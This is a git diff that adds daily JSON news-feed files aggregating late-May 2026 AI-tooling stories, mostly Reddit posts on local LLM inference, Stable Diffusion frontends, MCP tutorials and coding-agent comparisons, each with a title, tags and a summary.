these. I wouldn't have specified any of them in advance; all of them match the shape of the work. The literature calls this a self-modifying execution environment. It's been a footnote because five things have to be true together: 1. The agent writes a tool definition. 2. The runtime registers it witho…", + "category": "ai_tools" + }, + { + "title": "Jack Clark announces fictional story with optimistic outlook on humanity's future amid powerful AI systems for next Import AI newsletter — Issue publishes Tuesday; reply questions thematic shift.", + "url": "https://www.digg.com/ai/esmbs3o1?rank=8", + "source": "Digg AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-05-23T18:00:21.861Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "SemiAnalysis posted data from 174,264 agentic coding sessions showing 42% of runtime on CPU tasks versus 58% on GPU inference and highlighted cloud pricing mismatches with per-token monetization — Median per-turn time measured 5.13 seconds.", + "url": "https://www.digg.com/ai/h7rp9igv?rank=6", + "source": "Digg AI", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-05-23T18:00:21.855Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "What features do you wish ComfyUI or A1111 had?", + "url": "https://reddit.com/r/StableDiffusion/comments/1tllp2t/what_features_do_you_wish_comfyui_or_a1111_had/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-23T16:52:11.000Z", + "summary": "TL;DR: I’m building a local orchestration layer on top of ComfyUI, A1111, and Easy Diffusion that manages workflows, prompt generation, tagging, scoring, and generation history to figure out which models/LoRAs/settings actually produce the best results over time. What next features would you find useful? A little while ago I asked people what features they liked most in their local AI image/video UI setups. Since then I’ve kept building my own local orchestration app around ComfyUI, Easy Diffusion, and Automatic1111, and it has evolved into more of a full workflow layer than I originally planned. I’ll eventually open source it, so I’d love feedback from people who spend a lot of time with local generation tools. The idea is basically this: Instead of using one UI directly for everything, the app sits on top of multiple local backends and manages the overall generation workflow, history, orchestration, and review process. Right now it supports: * launching/stopping backends from inside the app * choosing which backend to use per run * queued multi-run jobs * image + video generation workflows * selecting saved ComfyUI workflows * centralized gallery/history across all runs * per-im…", + "category": "creative_tools" + }, + { + "title": "GitHub - ForgeFlash: A clean, minimal frontend for Stable Diffusion WebUI Forge — inspired by Fooocus's streamlined workflow but with direct access to the controls that actually matter.", + "url": "https://reddit.com/r/StableDiffusion/comments/1tll04p/github_forgeflash_a_clean_minimal_frontend_for/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-05-23T16:25:40.000Z", + "summary": "Hi all. My workflow usually includes quick drafting with Fooocus and/or WebUI before committing to batch generation in ComfyUI, and while I enjoy the streamlined approach of Fooocus, the missing hi-res/upscale etc is a drag. And WebUI sometimes feels a bit too busy for when I just want to 'prompt and go'. So I created this very simple new UI which sits between the two philosophically. You need Forge running, but the UI itself is very streamlined HTML/JS/CSS file leveraging Forge in API mode. The Readme covers all the details and modifying the hard coded parts is quite simple. Just launch forge with API parameters and open the web page in your browser, it will point to [http://127.0.0.1:7860](http://127.0.0.1:7860) by default and get your installed checkpoints etc. PNG metadata stripping also included. Any comments and feedback welcome, as I do have some ideas for further development, but intend to keep it lightweight and easy to approach.", + "category": "creative_tools" + }, + { + "title": "Benchmarked Needle 26M vs Qwen3-0.6B on CPU function calling, 50 queries across 5 difficulty tiers. The 23x smaller model wins on accuracy and is 4.4x faster.", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tljs5o/benchmarked_needle_26m_vs_qwen306b_on_cpu/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-05-23T15:38:34.000Z", + "summary": "Ran a head-to-head on two open-weight models for tool-calling on a 4-core CPU, no GPU, no cherry-picking. Wanted to see if the small specialist (Needle, 26M, distilled from Gemini 3.1 for function calls) actually holds up against a small generalist (Qwen3-0.6B) that also does tools. Setup: 50 queries across 5 tiers (simple, paraphrased, implicit, ambiguous, edge cases including foreign language and a \"don't call any tool\" trap). 5 mock tools. Three metrics per run: parse\\_success, tool\\_match, args\\_match. Same queries, same eval rubric, same hardware. Headline numbers: Needle (26M) Qwen3 (0.6B) tool_match overall 72.0% 56.0% parse_success 84.0% 54.0% args_match | match 97.2% 100.0% mean latency 10.9s 47.9s The interesting part is not the overall win, it's the failure shapes. They diverge completely: * **Needle** fails by picking the wrong tool. When it does pick a tool, args are right 97% of the time. Its sin is selection, mostly routing system commands to search\\_web instead of run\\_command. * **Qwen3** fails by not calling a tool at all. Every single one of its 22 misses is a parse failure where it answered in prose instead of emitting `<tool_call>` tags. When it does emi…", + "category": "ai_models" + }, + { + "title": "GPT 5.5 \"secret sauce\" is just having the thinking be some stupid caveman mode?", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tljrtk/gpt_55_secret_sauce_is_just_having_the_thinking/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-23T15:38:11.000Z", + "summary": "I think I had GPT-5.5 leak its trace during a normal conversation, and it really reads like the caveman mode fad from a few months back. Maybe we can achieve better token efficiency by taking some high-quality thinking trace from an open model, \"caveman-izing\" it, and fine-tuning on it. Here is the full log of GPT-5.5 going insane: https://gist.github.com/aussetg/20747ae00df17992acb4ebdfcd8d8d88 EDIT: Ok people I got it the first time", + "category": "ai_models" + }, + { + "title": "My experience using Claude code with Local Llm, and full guide on how to set it up", + "url": "https://reddit.com/r/ClaudeAI/comments/1tlir65/my_experience_using_claude_code_with_local_llm/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-05-23T14:58:46.000Z", + "summary": "Wanted to share a workflow I tested on a real flight, in case anyone else is trying to set up offline Claude Code. The core idea: using ollama to pull the needed model of what you need, and then use it to run claude code The setup, in order: 1. Pull a model on home wifi the night before. \\`ollama pull <model>\\` — \\~9 GB for a 14B, \\~17 GB for a 26B. Don't try this at the gate. 2. In Claude Code, point at Ollama. The cleanest path I found is wrapping it in two aliases: alias claude-local='ollama launch claude --model gemma4:26b' alias claude-cloud='claude' 3. Verify on the ground with wifi physically off. If it works in airplane mode at home, it works at 10 km in the sky. Where I got it wrong: I prepped qwen2.5-coder:14b first because it's the model everyone recommends in local-LLM threads. On the flight, it choked on Claude Code's tool loop; one call took 25 seconds, another took 52. For a workflow that chains five or six tool calls per task, that's unusable. Switched mid-flight to gemma4:26b (which I'd pulled as a backup). Different category of model, RL-trained for tool use, not just code completion. The tool loop ran at a usable speed. The gap analysis I was running on a…", + "category": "ai_tools" + }, + { + "title": "Removing Vision from model", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tlhkts/removing_vision_from_model/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-05-23T14:11:59.000Z", + "summary": "I removed mmproj file from models to remove vision and save my vram. But just curious, is this really don't affect its text ability? I use Qwen 3.6 35b a3b by unsloth and mainly use for agentic coding", + "category": "ai_models" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-24.json b/data/news-feed-2026-05-24.json new file mode 100644 index 0000000..7c26aec --- /dev/null +++ b/data/news-feed-2026-05-24.json @@ -0,0 +1,269 @@ +{ + "generated": "2026-06-05T00:44:43.107Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-24", + "article_count": 15, + "archived_story_count": 365, + "articles": [ + { + "title": "I built a local GUI for the TradingAgents framework — works with Ollama", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tm2ct0/i_built_a_local_gui_for_the_tradingagents/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source", + "developer_tool", + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "open_source", + "developer_tool", + "cli_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-05-24T04:51:09.000Z", + "summary": "https://preview.redd.it/i90oxxk7n03h1.png?width=1898&format=png&auto=webp&s=7d219c804fda7dfe122b84fcdb6d0d6883818c68 A while back I came across [TradingAgents](https://github.com/TauricResearch/TradingAgents) — a really cool multi-agent LLM stock analysis framework where like a dozen \"agents\" (market analyst, news analyst, bull researcher, bear researcher, risk team, etc.) debate a stock and produce a final trade recommendation. The output is genuinely interesting to read. Problem: it ships as a CLI. You pick options in a terminal, watch logs scroll, then go hunt for markdown files on disk. The reports are good, the experience of getting to them isn't. So I forked it and bolted on a web GUI. Runs locally, talks to whatever LLM provider you have a key for (OpenAI, Anthropic, Google, OpenRouter, DeepSeek, Ollama, xAI, Qwen, GLM, MiniMax). All Apache 2.0. Some things I ended up adding because I wanted them: * Live pipeline visualization showing which agent is working * Reports tab with a 3-pane reader, table-of-contents, search * A \"report length\" knob (Concise / Standard / Comprehensive) — concise mode saves \\~50% tokens * Multi-session chat where you can pin past report…", + "category": "ai_models" + }, + { + "title": "VRAM Suite: early pre-alpha tool for VRAM diagnostics, bounded CUDA probing, and OOM risk estimation", + "url": "https://reddit.com/r/StableDiffusion/comments/1tmixth/vram_suite_early_prealpha_tool_for_vram/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "api_update", + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool", + "cli_tool" + ], + "importance": 0.9400000000000001, + "date": "2026-05-24T17:45:15.000Z", + "summary": "# I started building VRAM Suite — a small framework for VRAM diagnostics in local AI workflows Hi. I wanted to share a small pre-alpha project I started building: \\*\\*VRAM Suite\\*\\*. The basic idea is simple: local AI workflows often fail with CUDA OOM only after everything has already started. I got tired of guessing how much VRAM is actually usable, so I started writing a small Python framework to inspect, record, and later predict VRAM behavior. It is still early, but the current version already has a working foundation. # What works now * CLI command: \\`vramsuite doctor\\` * Public Python API: \\`import vramsuite\\` * Structured doctor API: \\`run\\_doctor()\\` * System/runtime fingerprinting * Optional PyTorch/CUDA detection * NVIDIA GPU memory reading through NVML using \\`ctypes\\` * Driver-level total/free/used VRAM without requiring PyTorch * \\`.vramcard\\` JSON profile format * Rich terminal report output * Optional bounded CUDA allocation probe through PyTorch * Basic OOM risk estimation using \\`--estimate-mb\\` # Example `uv run vramsuite doctor --probe --probe-max-mb 12288 --probe-step-mb 256 --probe-free-floor-mb 2048 --estimate-mb 8000` # Example output summary from my RTX 50…", + "category": "creative_tools" + }, + { + "title": "Claude working autonomously", + "url": "https://reddit.com/r/ClaudeAI/comments/1tm9gm5/claude_working_autonomously/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "mcp", + "developer_tool" + ], + "importance": 0.8600000000000001, + "date": "2026-05-24T11:21:02.000Z", + "summary": "Goodmorning, Has anyone figure out how to configure Claude so that it runs autonomously, almost like Openclaw? I wanted to figure out if it could just autonomously respond to LinkedIn messages and reach out on my behalf? I know i can do this within cowork with mcp servers and tools but didn’t know if managed agents or the SDK would be my best option to try and create this full system", + "category": "ai_tools" + }, + { + "title": "Agent Zero CLI Update Signals Computer Use Polish For Agent Frameworks", + "url": "https://x.com/alessandro_a0/status/2058278886572433812", + "source": "Aligned News (Scoble)", + "tags": [ + "cli_tool", + "agent_tool" + ], + "matching_tags": [ + "cli_tool", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-24T18:23:11.433Z", + "summary": "A current post says A0 CLI v1.11 and Agent Zero v1.17 are live after a Computer Use announcement.", + "category": "ai_tools" + }, + { + "title": "Working on a cgo-free CUDA binding in Go for ML stuff Week 3 - open source [P]", + "url": "https://reddit.com/r/MachineLearning/comments/1tmb4qw/working_on_a_cgofree_cuda_binding_in_go_for_ml/", + "source": "Reddit r/MachineLearning", + "tags": [ + "api_update", + "open_source" + ], + "matching_tags": [ + "api_update", + "open_source" + ], + "importance": 1, + "date": "2026-05-24T12:41:07.000Z", + "summary": "At our work we use CUDA in Rust since the company switched to it recently. Rust has pretty good Driver API bindings but it made me wonder why the hell we cant have something decent in Go without cgo. I mostly build ML tools in the last month and Go is my main language for pretty much everything. Problem is most Go CUDA projects still need cgo and the full toolkit at build time. That breaks cross compilation and makes Docker images huge which sucks when working on machine learning projects. So last month I started messing around with a proof of concept that loads [libcuda.so](http://libcuda.so) at runtime using purego. No cgo at all. Biggest pain was thread affinity. CUDA keeps context per thread so goroutines switching around kept breaking things. I built a simple executor that locks an OS thread with runtime.LockOSThread and funnels all calls through a channel. Heres roughly what using it looks like right now: func run() error { cuda.Init() dev, _ := cuda.GetDevice(0) ctx, _ := dev.Primary() defer ctx.Close() a, _ := cuda.Alloc[float32](ctx, 1024) b, _ := cuda.Alloc[float32](ctx, 1024) c, _ := cuda.Alloc[float32](ctx, 1024) stream, _ := ctx.NewStream() start, _ := ctx.NewEvent()…", + "category": "ai_research" + }, + { + "title": "PapersWithCode new features - week 1 [P]", + "url": "https://reddit.com/r/MachineLearning/comments/1tmawv5/paperswithcode_new_features_week_1_p/", + "source": "Reddit r/MachineLearning", + "tags": [ + "open_source", + "tool_update" + ], + "matching_tags": [ + "open_source", + "tool_update" + ], + "importance": 1, + "date": "2026-05-24T12:31:12.000Z", + "summary": "Hi, Niels here from the open-source team at Hugging Face. It's been one week since I [launched](https://www.reddit.com/r/MachineLearning/comments/1tgmwqr/reviving_paperswithcode_by_hugging_face_p/) [paperswithcode.co](http://paperswithcode.co), a revival of the website we all loved. It allows us to keep track of the state-of-the-art (SOTA) across various domains of AI, from agents to computer vision and time-series forecasting. The reception has been great, and I'm excited to extend this over the next few months. This week, I've added the following features: \\- Support for multiple metrics for a given benchmark: leaderboards now support multiple metrics, see e.g., the [Open ASR Leaderboard](https://paperswithcode.co/benchmark/open-asr-leaderboard) for automatic speech recognition, which supports both Word Error Rate (WER) and the Inverse Real-Time Factor (RTFx) metrics, or the [Object Detection leaderboard](https://paperswithcode.co/benchmark/coco-val2017), which now also reports frames-per-second (FPS) besides mean average precision (mAP) on COCO. https://preview.redd.it/owlxn0b5u23h1.png?width=2878&format=png&auto=webp&s=1dff2f8feab4f160f77c97ceeb5d90e82382e63c \\- Su…", + "category": "ai_research" + }, + { + "title": "Qwen Plays ̶p̶̶o̶̶k̶̶e̶̶m̶̶o̶̶n̶ ? / QWEN PLAYS DCSS! - qwen3.6-35b-a3b@q4_k_xl plays open source roguelike adventure DCSS (and does a decent job)", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tm9nx3/qwen_plays_pokemon_qwen_plays_dcss_qwen3635ba3bq4/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source", + "cli_tool" + ], + "matching_tags": [ + "open_source", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-24T11:31:24.000Z", + "summary": "Hi, (TLDR.): Qwen in its MTP version has tool call bugs and outputs everything into tool/thinking blocks - mangeling the output - canceling the +speed with repeated wrong tool calls! DCSS works well with non MTP qwen even on smaller qwants. im Testing the new MTP models and thought the Hermes plays pokemon skill would be fun to test - expecting codex doing a good job and Qwen at least being able to navigate etc - but after a little research it looks like all LLM (even the big ones) cant play pokemon without hickups - so i tried to find a game the LLM can play - to use it as benchmarks - all the numbers from the official benchmarks are a nice indicator but i wanted real tests - after tons of IMG research and push to telegram etc - palying games seemed the next step to test - Qwen can play DCSS in its qwen3.6-35b-a3b@q4\\_k\\_xl NON MTP VERSION pretty well! in a Terminal you can see/control if needed! - telegram text update + ascii/screenshots on milestones or errors \\- MTP version produced mangeled tool calls! (240k context/8koutput token, 0,6 temp/20topK, 1Rep. penalty, 1.5 pres. penalty, 0.95 topP) LM studio on 5090 if anyone is interested in the skill / prompt i can upload it late…", + "category": "ai_models" + }, + { + "title": "How I do use the recent llama.cpp native tools to do web rag a.k.a. web_fetch (or anything else for the matter) directly from inside the llama-server's webui", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tm93ng/how_i_do_use_the_recent_llamacpp_native_tools_to/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "cli_tool", + "agent_tool" + ], + "matching_tags": [ + "cli_tool", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-24T11:02:32.000Z", + "summary": "As some other fellow lllmers I've discovered few days ago that the amazing llama.cpp project has just added native tools functionalities into the server. After having enabled the relative options into llama-server and played a bit with the most harmless of them all, get\\_datetime, I've bit the bullet and cautiously enabled the big boss: exec\\_shell\\_command. Building upon my recent sandboxing efforts relative to pi coding agent, another fantastic tool, I implemented this workflow to more safely use it into linux by multi-sandboxing: step 0) enabled llama-server options for native tools step 1) install firejail system wide step 2) create a new linux user called vmagents (a.k.a. \"virtual machine agent smith\") to prevent escalation or messing up with my own user workspace home dir step 3) login into vmagents user and install smolmachines, an easy to use OCI virtual machine containers harness step 4) create a VM called minivm and start it to pull in a bare bones busybox commands based Alpine linux OCI image step 5) create the script minivm-exec (and make it executable) into vmagents exec dir to spinup the sandbox VM, exec a given command into it into further firejail sandbox, turn it…", + "category": "ai_models" + }, + { + "title": "48 frontends for Comfy!", + "url": "https://reddit.com/r/StableDiffusion/comments/1tm25k8/48_frontends_for_comfy/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "api_update", + "tool_update" + ], + "matching_tags": [ + "api_update", + "tool_update" + ], + "importance": 1, + "date": "2026-05-24T04:40:33.000Z", + "summary": "This is an update of the list that I made 5 months ago. [4 months ago it was 26](https://www.reddit.com/r/StableDiffusion/comments/1qyrw4z/26_frontends_for_comfy/). Many of UIs were suggested by user iwr-redmond. Below is list with only names; links, descriptions are in the awesome list itself on github: [https://github.com/light-and-ray/awesome-alternative-uis-for-comfyui](https://github.com/light-and-ray/awesome-alternative-uis-for-comfyui) Category 1: Close integration, work with the same workflows 1. SwarmUI 2. Minimalistic Comfy Wrapper WebUI 3. Open Creative Studio for ComfyUI 4. ComfyUI Mobile Frontend 5. ComfyMobileUI 6. ComfyChair 7. ComfyScript 8. WorkflowUI 9. FlowScale AIOS 10. ComfyUI-Workflow-Studio 11. Promptus CosyUI Category 2: UI for workflows exported in API format 1. ViewComfy 2. ComfyUI Mini 3. Generative AI for Krita (Krita AI diffusion) 4. Intel AI Playground 5. Comfy App (ComfyUIMobileApp) 6. ComfyUI Workflow Hub 7. Mycraft 8. ComfyUI WebUI Generator 9. Nexa - Your On-the-Go ComfyUI Companion 10. CivitDeck 11. ComfyUI Skills for OpenClaw 12. ComfyUI\\_bsk\\_UI 13. OutSweeper 14. Orange Category 3: Use Comfy UI as runner server (worklows made by developers) 1.…", + "category": "creative_tools" + }, + { + "title": "🚀 Skills for small businesses, officially released by Anthropic", + "url": "https://reddit.com/r/ClaudeAI/comments/1tm94ai/skills_for_small_businesses_officially_released/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "developer_tool", + "agent_tool" + ], + "matching_tags": [ + "developer_tool", + "agent_tool" + ], + "importance": 0.8600000000000001, + "date": "2026-05-24T11:03:28.000Z", + "summary": "Anthropic’s 31 small-business skills reportedly hit around 382,000 downloads on day one. And now someone has mapped the whole thing into a setup workflow that can apparently be deployed in \\~10 minutes. This is actually a pretty interesting shift. Small businesses used to stitch together automations manually across: Zapier Notion CRM tools email workflows internal docs custom scripts Now AI companies are starting to package the whole thing into reusable skill packs: 🧠 workflow 📚 memory ⚙️ behavior 🔗 connectors 🤖 orchestration 📋 operating rules Basically: business operations as AI-readable skill files. The best part? You don’t necessarily need Claude to use them. At the core, these are still .md skill files describing workflows for AI agents. So even if you’re using Codex, Cursor, Gemini, or another coding agent, you can still study the structure, adapt the workflows, and plug the ideas into your own agent setup. This feels like the beginning of a new category: “AI business operating templates.” GitHub: https://github.com/anthropics/knowledge-work-plugins", + "category": "ai_tools" + }, + { + "title": "Claude code - Cultivate your context window to get the max out of your tokens", + "url": "https://reddit.com/r/ClaudeAI/comments/1tm594m/claude_code_cultivate_your_context_window_to_get/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 0.8600000000000001, + "date": "2026-05-24T07:27:11.000Z", + "summary": "Many times during the start of the session or when you have cleared or compacted the session, claude tends to read the entire codebase resulting in context window bloating. if your repo is large and/or if you are working with multiple repos it means your context window will have a lot of stuff which are not really relevant for the feature work that you are doing rn. Instead of claude having to read the entire codebase you have a map of your repos at different granularity and guide claude using [claude.md](http://claude.md) file to read the map. this helps claude get the context better without the context window bloating. if you are working on typescript/javascript based repos you can check what i built here in this repo: [https://github.com/justinjamesmathew/tokenmax-mcp](https://github.com/justinjamesmathew/tokenmax-mcp) the idea is to have three tiers of structural context loaded at three different times. The Registry is a small directory of every repo that is registered, with a short paragraph for each covering what it does, what stack it uses, where it lives, and when it was last indexed. It loads automatically into every Claude Code session via \\~/.claude/[CLAUDE.md](http://c…", + "category": "ai_tools" + }, + { + "title": "LongCat-Video-Avatar 1.5 Release", + "url": "https://reddit.com/r/StableDiffusion/comments/1tm5oxh/longcatvideoavatar_15_release/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 0.78, + "date": "2026-05-24T07:52:12.000Z", + "summary": "HuggingFace Link: [meituan-longcat/LongCat-Video-Avatar-1.5 · Hugging Face](https://huggingface.co/meituan-longcat/LongCat-Video-Avatar-1.5) LongCat-Video-Avatar 1.5, an upgraded open-source framework that prioritizes extreme empirical optimization and production-readiness for audio-driven human video generation. Built upon the LongCat-Video foundation model, v1.5 delivers highly stable, commercial-grade avatar video synthesis supporting native tasks including Audio-Text-to-Video (AT2V), Audio-Text-Image-to-Video (ATI2V), and Video Continuation, with seamless compatibility for both single-stream and multi-stream audio inputs. # [](https://huggingface.co/meituan-longcat/LongCat-Video-Avatar-1.5#key-features)Key Features * 🌟 **Upgraded Audio Encoder (Whisper-Large):**: Replaces Wav2Vec2 with Whisper-Large, yielding significantly smoother and more natural lip dynamics. * 🌟 **Production-Ready Stability**: Achieves accurate lip-synchronization, full-body temporal stability, and robust long-video generation with strict identity consistency. * 🌟 **Stylized Domain Generalization**: Robustly generalizes to anime, animals, and complex real-world conditions such as multi-person interactio…", + "category": "creative_tools" + }, + { + "title": "Claude records demo videos for me now", + "url": "https://reddit.com/r/ClaudeAI/comments/1tmkee4/claude_records_demo_videos_for_me_now/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "open_source", + "tool_update" + ], + "matching_tags": [ + "open_source", + "tool_update" + ], + "importance": 0.62, + "date": "2026-05-24T18:38:15.000Z", + "summary": "I hate recording demo videos, so I made an open source skill for it: [https://github.com/MobAI-App/desktop-recorder-skill](https://github.com/MobAI-App/desktop-recorder-skill) Now I can give Claude a prompt like: Record a short demo of this app flow And it handles the annoying parts for me: preparing the app state, clicking through the flow, recording, adding cursor/click effects and captions, then exporting the video. So instead of spending time setting everything up and recording the same demo manually, I can let Claude do it while I work on something else. It also has Remotion integration, so Claude can generate more polished and editable videos from the recording, not just raw screen captures. The video attached to this post is the result of the skill itself. Also working on the same idea for mobile apps: [https://github.com/MobAI-App/mobile-recorder-skill](https://github.com/MobAI-App/mobile-recorder-skill)", + "category": "ai_tools" + }, + { + "title": "hipEngine: Fast Native Qwen 3.6 Inference for RDNA3 (Strix Halo, 7900 XTX)", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tmq4s6/hipengine_fast_native_qwen_36_inference_for_rdna3/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-24T22:21:21.000Z", + "summary": "A few weeks ago, after finishing [FastDMS](https://www.reddit.com/r/LocalLLaMA/comments/1t3vlrx/fastdms_64x_kvcache_compression_running_faster/), I started toying around writing some RDNA3 kernels again to see how fast I could get Qwen 3.6 MoE running. It turned out well enough, so over the past couple weeks, I turned those experiments into [hipEngine](https://github.com/shisa-ai/hipEngine), a new open source (AGPLv3) ROCm-native local LLM inference engine. It's Python based, but with no heavy PyTorch dependency. All the hot-path is HIP/C++, making liberal use of AMD native libs like hipBLASLt, hipGraph, AOTriton, etc. ### gfx1100 (Radeon RX 7900 XTX / Radeon Pro W7900) The initial implementation has Qwen 3.6 (MoE and dense) running competitively with llama.cpp, with the [ParoQuant](https://github.com/shisa-ai/paroquant) (which I've also ported to be ROCm compatible) 4.68bpw having better c=1 prefill (\"prompt processing\") at every tested context length, from 512-128K on gfx1100 (W7900/7900 XTX): ### Prefill tok/s | Workload | hipEngine PARO | hipEngine GGUF Q4_K_S | llama.cpp HIP | llama.cpp Vulkan | | --- | ---: | ---: | ---: | ---: | | 512/128 | **2718.497** | 2258.847 | 2436.04…", + "category": "ai_models" + }, + { + "title": "MergeNB: An intuitive merge conflict resolver built for Jupyter notebooks in VS Code [P]", + "url": "https://reddit.com/r/MachineLearning/comments/1tmq1eb/mergenb_an_intuitive_merge_conflict_resolver/", + "source": "Reddit r/MachineLearning", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 1, + "date": "2026-05-24T22:17:41.000Z", + "summary": "I used to work heavily with Jupyter Notebooks + git + VS Code in a collaborative research setting and found nbdime to be somewhat buggy/a hassle to work with in general. So, in typical side project fashion ([relevant xkcd](https://xkcd.com/1319/)) I've been working on MergeNB quite a bit over the last 6 months or so. It's (currently only) a VS Code extension with a web UI, and has a few cool improvements over other alternatives, which I outlined in the README/docs site. I'd be over the moon if this actually gets used by people, and would love a star if it's interesting. See [https://github.com/Avni2000/MergeNB](http://github.com/Avni2000/MergeNB). I've also been working on a static documentation site here: [https://avni2000.github.io/MergeNB/docs](https://avni2000.github.io/MergeNB/docs) I'm planning on working on it a lot more over the summer and properly fleshing out a few of the ideas I had (including making it a git mergetool as well as a VS Code extension), so if you'd like to contribute, feel free to raise an issue or shoot me a message/email :)", + "category": "ai_research" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-25.json b/data/news-feed-2026-05-25.json new file mode 100644 index 0000000..23b23d4 --- /dev/null +++ b/data/news-feed-2026-05-25.json @@ -0,0 +1,279 @@ +{ + "generated": "2026-06-05T00:44:43.508Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-25", + "article_count": 15, + "archived_story_count": 588, + "articles": [ + { + "title": "I made a local-first MCP tutorial repo with node-llama-cpp and a custom agent loop", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tn1jjy/i_made_a_localfirst_mcp_tutorial_repo_with/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "mcp", + "developer_tool", + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "api_update", + "mcp", + "developer_tool", + "cli_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-05-25T07:14:17.000Z", + "summary": "I just published a repo called MCP from Scratch that teaches the Model Context Protocol by building it step by step in plain Node.js. Most of the repo is about understanding MCP itself, but the later modules may be relevant here: I added a local-first setup using `node-llama-cpp`, GGUF models, MCP sampling, and a custom plan -> act -> observe agent loop. So the repo goes from: * raw JSON-RPC and stdio transport * to a working MCP server with tools/resources/prompts * to local model integration * to an agent loop that uses MCP tools with a local GGUF model There’s also an optional LangChain example, but the main path is intentionally minimal and tries to make the underlying mechanics obvious. Key points: * plain Node.js, minimal abstractions * designed as a learning repo, not a production SDK * uses shared local GGUF models for the later modules * built for people who want to understand what MCP tooling is actually doing under the hood Repo: [https://github.com/pguso/mcp-from-scratch](https://github.com/pguso/mcp-from-scratch) Would especially love feedback from people here on the local inference side: * model choice * whether the agent loop examples feel useful or too toy-ish", + "category": "ai_models" + }, + { + "title": "I stress-tested Kimi K2.6 against Claude Opus 4.7 on a quick coding-agent task", + "url": "https://reddit.com/r/ClaudeAI/comments/1tn9fpq/i_stresstested_kimi_k26_against_claude_opus_47_on/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "open_source", + "tool_update", + "agent_tool" + ], + "matching_tags": [ + "api_update", + "open_source", + "tool_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-25T13:37:21.000Z", + "summary": "I tested Claude Opus 4.7 and Kimi K2.6 on the same coding agent task i.e. build an AI Fix Runner that takes a broken repo, runs its tests, identifies the failure, applies a patch, reruns the test, and exposes the final diff/logs through an API and UI. The goal was not to benchmark syntax completion or simple repo edits. I wanted to test model behavior on a less familiar integration path: shifting execution from local processes into remote sandboxes. I used Tensorlake specifically because the sandbox API is newer and integration-heavy. This made the test more about whether the model could reason through unfamiliar infra and produce a working implementation. Setup: * Claude Opus 4.7 through Claude Code * Kimi K2.6 through OpenCode via OpenRouter Pricing context: * Claude Opus 4.7: $5/M input, $25/M output * Kimi K2.6: $0.95/M input ($0.16 cached input), $4/M output So, what made it interesting is if Kimi's lower cost can handle a crazy workflow. To be clear, comparing Kimi K2.6 directly with Opus 4.7 is not completely fair. The model classes, pricing, and expected capability levels are very different. I mainly wanted to see how far an open model could get on the same task at a fract…", + "category": "ai_tools" + }, + { + "title": "Workbench Launches Open Source BullMQ Dashboard For Node Backends", + "url": "https://x.com/pontusab/status/2058588422001029549", + "source": "Aligned News (Scoble)", + "tags": [ + "product_launch", + "open_source", + "tool_update" + ], + "matching_tags": [ + "product_launch", + "open_source", + "tool_update" + ], + "importance": 1, + "date": "2026-05-25T01:21:33.840Z", + "summary": "Workbench launched as an open-source BullMQ dashboard with flows, metrics, schedulers, and search for Node backends.", + "category": "ai_tools" + }, + { + "title": "Ditched GitHub Copilot yearly subscription. What's the best way to run Claude nowadays?", + "url": "https://reddit.com/r/ClaudeAI/comments/1tnl23a/ditched_github_copilot_yearly_subscription_whats/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "developer_tool", 